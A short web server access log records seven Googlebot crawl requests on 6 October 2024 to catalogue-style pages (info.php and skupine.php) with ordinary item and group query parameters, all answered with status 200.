66.249.66.42 - - [06/Oct/2024:05:22:59 +0200] "GET /info.php?sifra=dbm020&skupina=82 HTTP/1.1" 200 19195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:23:59 +0200] "GET /skupine.php?skupina=82&stran=2 HTTP/1.1" 200 27376 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:25:00 +0200] "GET /info.php?sifra=064022&skupina=124 HTTP/1.1" 200 17400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:26:01 +0200] "GET /skupine.php?skupina=125 HTTP/1.1" 200 13595 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:27:01 +0200] "GET /skupine.php?skupina=126 HTTP/1.1" 200 15734 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:28:52 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:29:01 +0200] "GET /skupine.php?skupina=39 HTTP/1.1" 200 25623 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
